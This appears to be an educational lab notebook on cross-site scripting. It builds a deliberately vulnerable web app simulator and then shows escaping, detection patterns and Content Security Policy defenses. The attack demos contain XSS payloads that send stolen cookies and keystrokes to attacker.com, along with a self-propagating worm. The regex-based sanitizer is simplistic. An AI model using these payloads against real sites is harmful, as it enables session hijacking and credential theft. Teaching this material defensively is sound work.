# Cross-Site Scripting (XSS) - Hands-On Lab

**Part of HackLearn Pro**

Welcome to this interactive lab on Cross-Site Scripting! Learn how attackers exploit web applications through malicious scripts and how to prevent these attacks.

## Learning Objectives
- Understand the three types of XSS: Reflected, Stored, and DOM-based
- Learn how XSS attacks work and their impact
- Practice identifying XSS vulnerabilities
- Implement secure coding practices to prevent XSS
- Build defense mechanisms and sanitization functions

## Prerequisites
- Basic Python and HTML knowledge
- Understanding of web applications
- Familiarity with JavaScript (helpful)

---

## Setup

We'll simulate web application scenarios using Python and HTML:

In [None]:
import html
import re
from typing import Dict, List, Tuple
from urllib.parse import quote, unquote
from IPython.display import HTML, display

print("Setup complete! Ready to explore XSS vulnerabilities.")

## Part 1: Understanding XSS

XSS allows attackers to inject malicious scripts into web pages viewed by other users.

### Vulnerable Web Application Simulator

In [None]:
class VulnerableWebApp:
    """Simulates a vulnerable web application"""
    
    def __init__(self):
        self.comments = []  # Stored comments
        self.users = {
            'alice': {'session': 'abc123', 'role': 'admin'},
            'bob': {'session': 'xyz789', 'role': 'user'},
        }
    
    def generate_search_page(self, search_term: str) -> str:
        """Generate search results page (VULNERABLE to reflected XSS)"""
        # VULNERABLE: Directly embedding user input without escaping
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Search Results</title>
            <style>
                body {{ font-family: Arial, sans-serif; padding: 20px; }}
                .result {{ background: #f0f0f0; padding: 10px; margin: 10px 0; }}
                .alert {{ color: red; font-weight: bold; }}
            </style>
        </head>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: <strong>{search_term}</strong></p>
            <div class="result">No results found for "{search_term}"</div>
        </body>
        </html>
        """
        return html_page
    
    def generate_comment_page(self) -> str:
        """Generate comments page (VULNERABLE to stored XSS)"""
        comments_html = ""
        for comment in self.comments:
            # VULNERABLE: Directly embedding stored user content
            comments_html += f"""
            <div class="comment">
                <strong>{comment['user']}:</strong>
                <p>{comment['text']}</p>
            </div>
            """
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Comments</title>
            <style>
                body {{ font-family: Arial, sans-serif; padding: 20px; }}
                .comment {{ background: #f9f9f9; padding: 10px; margin: 10px 0; border-left: 3px solid #007bff; }}
            </style>
        </head>
        <body>
            <h1>User Comments</h1>
            {comments_html if comments_html else "<p>No comments yet.</p>"}
        </body>
        </html>
        """
        return html_page
    
    def add_comment(self, user: str, text: str):
        """Add a comment (vulnerable - no sanitization)"""
        self.comments.append({'user': user, 'text': text})
    
    def generate_profile_page(self, username: str) -> str:
        """Generate user profile page (VULNERABLE)"""
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>User Profile</title>
        </head>
        <body>
            <h1>Profile: {username}</h1>
            <p>Welcome, {username}!</p>
        </body>
        </html>
        """
        return html_page

# Create vulnerable app
app = VulnerableWebApp()
print("✓ Vulnerable web application created!")

## Part 2: Reflected XSS

Reflected XSS occurs when user input is immediately returned in the response without proper sanitization.

### Attack Demo 1: Basic Script Injection

In [None]:
print("Demo 1: Reflected XSS - Basic Script Injection")
print("=" * 70)

# Normal search query
normal_query = "python tutorial"
normal_page = app.generate_search_page(normal_query)
print(f"\nNormal query: {normal_query}")
print("Page generated successfully\n")

# XSS attack payload
xss_payload = '<script>alert("XSS Attack!")</script>'
xss_page = app.generate_search_page(xss_payload)

print(f"XSS payload: {xss_payload}")
print("\n🚨 VULNERABILITY DETECTED!")
print("The payload is embedded directly in the HTML:")
print("\nExtract from generated HTML:")
print("─" * 70)
# Show the vulnerable part
vulnerable_line = [line for line in xss_page.split('\n') if xss_payload in line][0]
print(vulnerable_line.strip())
print("─" * 70)
print("\n⚠️ If rendered in a browser, this would execute JavaScript!")
print("Impact: Cookie theft, session hijacking, page defacement")

### Attack Demo 2: Cookie Stealing

In [None]:
print("\nDemo 2: Reflected XSS - Cookie Stealing")
print("=" * 70)

# Payload that would steal cookies
cookie_steal_payload = '<script>fetch(\'http://attacker.com/steal?cookie=\' + document.cookie)</script>'

print(f"\nPayload: {cookie_steal_payload}")
print("\nWhat this does:")
print("1. Executes JavaScript in victim's browser")
print("2. Reads document.cookie (session token, user data)")
print("3. Sends cookie to attacker's server")
print("4. Attacker can now impersonate the victim")

page = app.generate_search_page(cookie_steal_payload)
print("\n🚨 CRITICAL: Session hijacking possible!")

### Attack Demo 3: Keylogger Injection

In [None]:
print("\nDemo 3: Reflected XSS - Keylogger")
print("=" * 70)

# Payload that installs a keylogger
keylogger_payload = '''
<script>
document.addEventListener('keypress', function(e) {
    fetch('http://attacker.com/log?key=' + e.key);
});
</script>
'''.strip()

print(f"\nPayload (simplified):")
print(keylogger_payload)
print("\nWhat this does:")
print("1. Listens to all keyboard events")
print("2. Captures every keystroke")
print("3. Sends keystrokes to attacker's server")
print("4. Can capture passwords, credit cards, personal info")
print("\n🚨 CRITICAL: Complete input monitoring!")

## Part 3: Stored XSS

Stored XSS occurs when malicious scripts are saved in the database and executed when other users view the content.

In [None]:
print("\nDemo 4: Stored XSS - Persistent Attack")
print("=" * 70)

# Attacker posts a malicious comment
malicious_comment = '<script>alert("Stored XSS - Everyone who views this page is affected!")</script>'

print("\nAttacker posts malicious comment...")
app.add_comment('attacker', malicious_comment)
print("✓ Comment stored in database")

# Victim views the comments page
print("\nVictim views comments page...")
comments_page = app.generate_comment_page()

print("\n🚨 VULNERABILITY DETECTED!")
print("Malicious script is now part of the page HTML:")
print("─" * 70)
for line in comments_page.split('\n'):
    if '<script>' in line:
        print(line.strip())
print("─" * 70)

print("\n⚠️ Impact:")
print("- Every user who views this page is affected")
print("- Attack persists until admin removes the comment")
print("- Can steal sessions from ALL users")
print("- Much more dangerous than reflected XSS")

### Stored XSS: Advanced Payload

In [None]:
print("\nDemo 5: Stored XSS - Worm Attack")
print("=" * 70)

# Self-propagating XSS worm
worm_payload = '''
<script>
// Steal session
fetch('http://attacker.com/steal?cookie=' + document.cookie);

// Propagate by posting the same payload as a comment
// (if there's a comment API)
fetch('/api/comment', {
    method: 'POST',
    body: JSON.stringify({text: document.currentScript.innerHTML})
});
</script>
'''.strip()

print("Worm payload:")
print(worm_payload)
print("\nWhat this does:")
print("1. Steals the current user's session")
print("2. Automatically posts itself as a new comment")
print("3. Spreads to every user who views any infected comment")
print("4. Can take over entire platform in minutes")
print("\n🚨 CRITICAL: Self-propagating attack (XSS worm)!")
print("\nReal-world example: Samy worm on MySpace (2005)")
print("- Infected 1 million users in 20 hours")
print("- Fastest spreading virus in history at the time")

## Part 4: DOM-based XSS

DOM-based XSS occurs when JavaScript code processes user input unsafely.

In [None]:
print("\nDemo 6: DOM-based XSS")
print("=" * 70)

# Vulnerable JavaScript code example
vulnerable_js = '''
// VULNERABLE CODE (client-side)
const urlParams = new URLSearchParams(window.location.search);
const name = urlParams.get('name');
document.getElementById('greeting').innerHTML = 'Hello ' + name + '!';
'''

print("Vulnerable JavaScript:")
print(vulnerable_js)

print("\nNormal URL:")
print("https://example.com/page?name=Alice")
print("Result: Hello Alice!")

print("\nMalicious URL:")
malicious_url = 'https://example.com/page?name=<img src=x onerror="alert(document.cookie)">'
print(malicious_url)
print("\nResult: Script executes when page loads!")

print("\n⚠️ Key difference from reflected XSS:")
print("- Attack payload never sent to server")
print("- Processed entirely in the browser")
print("- Server-side filters won't help")
print("- Must be fixed in JavaScript code")

## Part 5: XSS Defense Mechanisms

### Defense 1: HTML Escaping

In [None]:
class XSSDefense:
    """XSS defense utilities"""
    
    @staticmethod
    def html_escape(text: str) -> str:
        """Escape HTML special characters"""
        return html.escape(text)
    
    @staticmethod
    def strip_tags(text: str) -> str:
        """Remove all HTML tags"""
        return re.sub(r'<[^>]+>', '', text)
    
    @staticmethod
    def sanitize_html(text: str, allowed_tags: List[str] = None) -> str:
        """Sanitize HTML, keeping only allowed tags"""
        if allowed_tags is None:
            allowed_tags = ['b', 'i', 'u', 'em', 'strong']
        
        # Remove all tags except allowed ones
        pattern = r'<(?!/?(' + '|'.join(allowed_tags) + r')\b)[^>]+>'
        sanitized = re.sub(pattern, '', text)
        
        # Remove event handlers
        sanitized = re.sub(r'\s*on\w+\s*=\s*["\'][^"\']*["\']', '', sanitized, flags=re.IGNORECASE)
        
        return sanitized
    
    @staticmethod
    def detect_xss(text: str) -> Tuple[bool, List[str]]:
        """Detect potential XSS patterns"""
        patterns = [
            (r'<script[^>]*>.*?</script>', 'Script tag detected'),
            (r'javascript:', 'JavaScript protocol detected'),
            (r'on\w+\s*=', 'Event handler detected'),
            (r'<iframe', 'IFrame tag detected'),
            (r'<object', 'Object tag detected'),
            (r'<embed', 'Embed tag detected'),
            (r'eval\s*\(', 'Eval function detected'),
        ]
        
        detections = []
        for pattern, message in patterns:
            if re.search(pattern, text, re.IGNORECASE | re.DOTALL):
                detections.append(message)
        
        return len(detections) > 0, detections

# Test defenses
print("\nDemo 7: Defense Mechanisms")
print("=" * 70)

test_payloads = [
    '<script>alert("XSS")</script>',
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">Click me</a>',
    'Hello <b>world</b>!',
]

for payload in test_payloads:
    print(f"\nOriginal: {payload}")
    print(f"HTML Escaped: {XSSDefense.html_escape(payload)}")
    print(f"Stripped: {XSSDefense.strip_tags(payload)}")
    print(f"Sanitized: {XSSDefense.sanitize_html(payload)}")
    
    is_xss, detections = XSSDefense.detect_xss(payload)
    if is_xss:
        print(f"⚠️ XSS detected: {', '.join(detections)}")
    else:
        print("✓ No XSS patterns detected")

### Defense 2: Secure Web Application

In [None]:
class SecureWebApp:
    """Secure web application with XSS protection"""
    
    def __init__(self):
        self.comments = []
        self.defense = XSSDefense()
    
    def generate_search_page(self, search_term: str) -> str:
        """Generate search page with XSS protection"""
        # SECURE: Escape user input
        safe_term = html.escape(search_term)
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Search Results</title>
            <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
        </head>
        <body>
            <h1>Search Results</h1>
            <p>You searched for: <strong>{safe_term}</strong></p>
        </body>
        </html>
        """
        return html_page
    
    def add_comment(self, user: str, text: str) -> Tuple[bool, str]:
        """Add comment with validation"""
        # Check for XSS
        is_xss, detections = self.defense.detect_xss(text)
        if is_xss:
            return False, f"Rejected: {', '.join(detections)}"
        
        # Sanitize content
        safe_text = self.defense.sanitize_html(text)
        safe_user = html.escape(user)
        
        self.comments.append({
            'user': safe_user,
            'text': safe_text
        })
        
        return True, "Comment added successfully"
    
    def generate_comment_page(self) -> str:
        """Generate secure comments page"""
        comments_html = ""
        for comment in self.comments:
            # Already sanitized during input
            comments_html += f"""
            <div class="comment">
                <strong>{comment['user']}:</strong>
                <p>{comment['text']}</p>
            </div>
            """
        
        html_page = f"""
        <!DOCTYPE html>
        <html>
        <head>
            <title>Comments</title>
            <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self'">
        </head>
        <body>
            <h1>User Comments</h1>
            {comments_html if comments_html else "<p>No comments yet.</p>"}
        </body>
        </html>
        """
        return html_page

# Test secure app
print("\nDemo 8: Secure Web Application")
print("=" * 70)

secure_app = SecureWebApp()

# Try to inject XSS
test_comments = [
    ('alice', 'This is a <b>normal</b> comment'),
    ('attacker', '<script>alert("XSS")</script>'),
    ('bob', 'Great post! <i>Thanks</i>'),
    ('attacker', '<img src=x onerror="alert(1)">')
]

for user, text in test_comments:
    success, message = secure_app.add_comment(user, text)
    status = "✓" if success else "✗"
    print(f"\n{status} User '{user}': {message}")
    print(f"   Input: {text[:50]}..." if len(text) > 50 else f"   Input: {text}")

print("\n" + "=" * 70)
print("✓ Secure application blocked all XSS attempts!")

### Defense 3: Content Security Policy (CSP)

In [None]:
print("\nDemo 9: Content Security Policy")
print("=" * 70)

csp_examples = {
    "Restrictive": "default-src 'self'",
    "With CDN": "default-src 'self'; script-src 'self' https://cdn.example.com",
    "Development": "default-src 'self' 'unsafe-inline' 'unsafe-eval'",
    "Strict": "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self' data:",
}

print("\nExample CSP Headers:\n")
for name, policy in csp_examples.items():
    print(f"{name}:")
    print(f"  Content-Security-Policy: {policy}")
    print()

print("What CSP does:")
print("✓ Blocks inline scripts (biggest XSS vector)")
print("✓ Restricts script sources to trusted domains")
print("✓ Prevents data exfiltration to untrusted domains")
print("✓ Reports violations to specified endpoint")
print("\n⚠️ Note: CSP is a defense-in-depth measure, not a replacement for input validation!")

## Part 6: Challenge Exercises

### Challenge 1: Build a Comprehensive XSS Filter

In [None]:
class AdvancedXSSFilter:
    """
    Advanced XSS filtering system
    
    TODO: Implement comprehensive XSS detection and filtering
    """
    
    def __init__(self):
        self.blocked_attempts = []
    
    def detect_xss(self, text: str) -> Tuple[bool, Dict]:
        """
        Detect XSS attempts
        
        TODO: Implement detection for:
        - Script tags (various encodings)
        - Event handlers
        - JavaScript protocols
        - Data URIs
        - Encoded payloads (base64, hex, unicode)
        - Obfuscated scripts
        
        Return: (is_xss, detailed_report)
        """
        pass
    
    def sanitize(self, text: str, context: str = 'html') -> str:
        """
        Context-aware sanitization
        
        TODO: Implement sanitization for different contexts:
        - HTML content
        - HTML attributes
        - JavaScript strings
        - URLs
        - CSS
        """
        pass

# Test your implementation
# filter = AdvancedXSSFilter()
# is_xss, report = filter.detect_xss("<script>alert(1)</script>")

### Challenge 2: Implement XSS Scanner

In [None]:
class XSSScanner:
    """
    Automated XSS vulnerability scanner
    
    TODO: Implement scanner that tests for XSS vulnerabilities
    """
    
    def __init__(self):
        self.payloads = [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            # Add more payloads
        ]
    
    def scan_input_field(self, submit_function, field_name: str) -> Dict:
        """
        Test an input field for XSS
        
        TODO: 
        - Test with various payloads
        - Detect if payload is reflected
        - Check if payload is executed
        - Report vulnerability severity
        """
        pass
    
    def generate_report(self) -> Dict:
        """Generate vulnerability report"""
        pass

# Test your scanner
# scanner = XSSScanner()
# report = scanner.scan_input_field(app.generate_search_page, 'search')

### Challenge 3: Build a CSP Validator

In [None]:
class CSPValidator:
    """
    Content Security Policy validator
    
    TODO: Implement CSP analysis and validation
    """
    
    def parse_csp(self, csp_header: str) -> Dict:
        """Parse CSP header into directives"""
        pass
    
    def validate_csp(self, csp_header: str) -> Tuple[bool, List[str]]:
        """
        Validate CSP for security issues
        
        TODO: Check for:
        - 'unsafe-inline' usage
        - 'unsafe-eval' usage
        - Overly permissive policies
        - Missing important directives
        - Incorrect syntax
        
        Return: (is_secure, list_of_issues)
        """
        pass
    
    def suggest_improvements(self, csp_header: str) -> List[str]:
        """Suggest CSP improvements"""
        pass

# Test your validator
# validator = CSPValidator()
# is_secure, issues = validator.validate_csp("default-src 'self' 'unsafe-inline'")

## Summary & Key Takeaways

In this lab, you learned:

1. **Three Types of XSS**:
   - **Reflected XSS**: User input immediately returned in response
   - **Stored XSS**: Malicious script saved in database
   - **DOM-based XSS**: Client-side script processes input unsafely

2. **Attack Vectors**:
   - Script tags
   - Event handlers (onerror, onclick, etc.)
   - JavaScript protocols (javascript:)
   - Data URIs
   - HTML attributes

3. **Defense Strategies**:
   - **Always escape output** based on context
   - Input validation and sanitization
   - Content Security Policy (CSP)
   - HTTPOnly and Secure cookie flags
   - X-XSS-Protection header
   - Use templating engines with auto-escaping

### Best Practices
1. Treat all user input as untrusted
2. Use context-aware output encoding
3. Implement Content Security Policy
4. Use HTTPOnly cookies to prevent JavaScript access
5. Validate input on both client and server
6. Use modern frameworks with built-in XSS protection
7. Regular security testing and code reviews
8. Educate developers about XSS risks

### Context-Specific Encoding
- **HTML Content**: Use HTML entity encoding
- **HTML Attributes**: Use attribute encoding
- **JavaScript**: Use JavaScript encoding
- **URLs**: Use URL encoding
- **CSS**: Use CSS encoding

### Real-World Impact
- Account takeover and session hijacking
- Data theft and credential harvesting
- Malware distribution
- Website defacement
- Phishing attacks

### Further Reading
- [OWASP XSS Guide](https://owasp.org/www-community/attacks/xss/)
- [Content Security Policy Reference](https://content-security-policy.com/)
- [XSS Filter Evasion Cheat Sheet](https://owasp.org/www-community/xss-filter-evasion-cheatsheet)

---

**HackLearn Pro** - Learn by doing, secure by design.
